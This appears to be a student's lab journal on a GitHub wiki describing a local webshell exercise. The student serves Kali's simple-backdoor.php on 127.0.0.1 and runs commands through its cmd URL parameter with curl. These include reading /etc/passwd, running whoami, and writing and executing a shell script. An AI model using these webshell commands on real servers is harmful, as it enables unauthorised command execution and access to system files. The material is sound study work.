Assignment 7.1 - Zacham17/my-tech-journal GitHub Wiki
Assignment 7.1: Webshells
Preparation
- A script to exploit a backdoor is located at /usr/share/webshells/php/simple-backdoor.php
- The script allows for command execution through a URL
- I made a directory called "webshell" and in it, I put an index.html file and I copied the simple-backdoor.php file into the directory
- I started running a PHP Web Server using the command
php -S 127.0.0.1:8090 -t
- This command runs a web server that listens on port 8090
Exploiting the PHP Web Server
- The simple-backdoor.php file can be utilized in the URL and can be used to execute commands on the PHP server.
- The syntax I used in the URL to execute commands was
http://127.0.0.1:8090/simple-backdoor.php?cmd=COMMAND_HERE
- For example: I used the URL
http://127.0.0.1:8090/simple-backdoor.php?cmd=cat+/etc/passwd to display the contents of the /etc/passwd file
- NOTE: The
+ symbol replaces spaces
- A great website to convert text to URL syntax is W3Schools
Using Curl to exploit PHP
- The curl command can be used to output the contents of commands executed through the URL
- An example of this is
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=ip+a
- This commands will show the IP information of the host
- The command
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=whoami can be used to output who is currently logged in to the server
Creating a Script on the PHP Server Remotely
- The following commands, executed in order, can be used to create a script on the PHP Server through commands embedded in the URLs
- 1:
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+%27%23%21%2Fbin%2Fbash%27+%3E+webshellScript.sh
- 2:
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=echo+%27id%27+%3E%3E+webshellScript.sh
- Those commands create a simple shell script that runs the
id command
Executing the Script
- I ran the script I created using the command
curl http://127.0.0.1:8090/simple-backdoor.php?cmd=sh+webshellScript.sh